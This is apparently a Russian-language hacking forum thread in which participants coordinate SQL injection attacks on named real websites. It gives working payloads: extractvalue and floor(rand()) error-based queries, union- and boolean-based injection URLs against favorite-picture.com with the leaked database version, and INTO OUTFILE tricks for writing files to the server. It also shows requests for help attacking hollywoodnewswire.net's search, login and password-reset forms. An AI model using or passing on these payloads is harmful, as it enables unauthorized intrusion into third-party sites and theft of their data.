попробуй в диру сайта лить, найти папку для записи, руками а не через хавиж, возможно глюк в нём! Кстати, возможно ковычки ' вызывают ошибку, но хавиж может тебе и не показать, будешь руками запросы посылась сам увидешь в чём проблема!
я пробовал уже) лил в папки которые доступны для записи... ноль эффекта. прочитал php.ini magic_quotes=off так что кавычки врятли тут роль играют)
сам пост/гет параметр можешь вызвать php ошибку, я не про фильтр говорю Откуда ты узнал, что папки доступны на запись?
Ну вообще прочитал скрипт для залития изображений из админки. там четко написанно что картинки и файлы будут заливатся в ту папку( ну и сообственно в папке этой куча грязи всякой) Ну а вообще я редко раньше встречал что бы /tmp/ была закрыта на запись) Поможешь в аське если есть время конешно, не хочу тут позорится просто : ))
пиши в асю гляну, права mysql могут отличасть от php, и там где может залить пхп скрипт, мускул может не залить файл!
может быть она просто выключена? по дефолту, обычно, вкл. присутствует в 5.7 и ниже http://dev.mysql.com/doc/refman/5.7/en/load-data.html
ребята кто знает как определить имя таблицы в sql инъекции error-based ситуация: mysql 5.6.x , у найденой инъекций нет доступа с базе information_schema Code: &orderby=1+and+extractvalue(rand(),concat(0x3a,(select+version()))) но продвинутся дальше не получается не знаю префикса названия таблиц вопрос как вызвать ошибку с названием таблицы в ней?
select table_name from information_schema.tables limit 1,1 вместо select version() с такими вопросами вам лучше сначала почитать статьи
Ну во первых, как советуют выкинь Хавидж и сделай вручную. К тому же переведи в HEX колонку к виду 0x0000000 и SELECT 0x0000 INTO OUTFILE /path К тому-же, tmp это который /tmp в корне сервера или в локации вебкорня? Тот что в корне сервера, на самом деле для всех должен быть доступен на запись, а вот любые, даже кешевые и тп директории внутри вебкорня для отличных от пользователя под которым работает php(etc) могут иметь права строго ограничивающие доступ
+ к посту YaBtr Заменяем пробелы на %20 Union Based http://www.favorite-picture.com/pictures/search/ffffff')and(1)=2%20order%20by%203%23.html http://www.favorite-picture.com/pictures/search/miss')and(1)=1%20union%20select%20@@version,222%23.html Boolean Based http://www.favorite-picture.com/pictures/search/ffffff')and(1='1.html http://www.favorite-picture.com/pictures/search/ffffff')and(1)=1%23.html Error Based Classic http://www.favorite-picture.com/pictures/search/miss')or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2)))%23.html Duplicate entry '5.5.38-0+wheezy11'
вы уверены, что доступа нет? может просто фильтруется? других способов получения имен таблиц нет. кроме грубой силы, само собой
Во первых попробовать так: `information_schema`.xxx. Во вторых, частенько бывает что права обрезают на information_schema.tables, стоит проверить information_schema.columns и выбирать оттуда
нет что то было это я точно помню мы как то в свое время определяли названия таблиц в mysql 4 там не было information_schema да перебрал все таблицы из базы information_schema по нулям 99.9% нет доступа к information_schema
Code: http://hollywoodnewswire.net/pubPages/other/search_results.php?searchStr=Photo%27 Там parameter length constraint mechanism. Как обойти для вывода?
чтобы не мучаться с этим, есть еще post sqli в форме входа http://hollywoodnewswire.net/scripts/login.php тогда вспоминайте, мне данные способы неизвестны.
Да, я видела, и в форме "забыл пароль" тоже. Но их я не могу раскрутить. =\ Не подскажешь, какой там подход?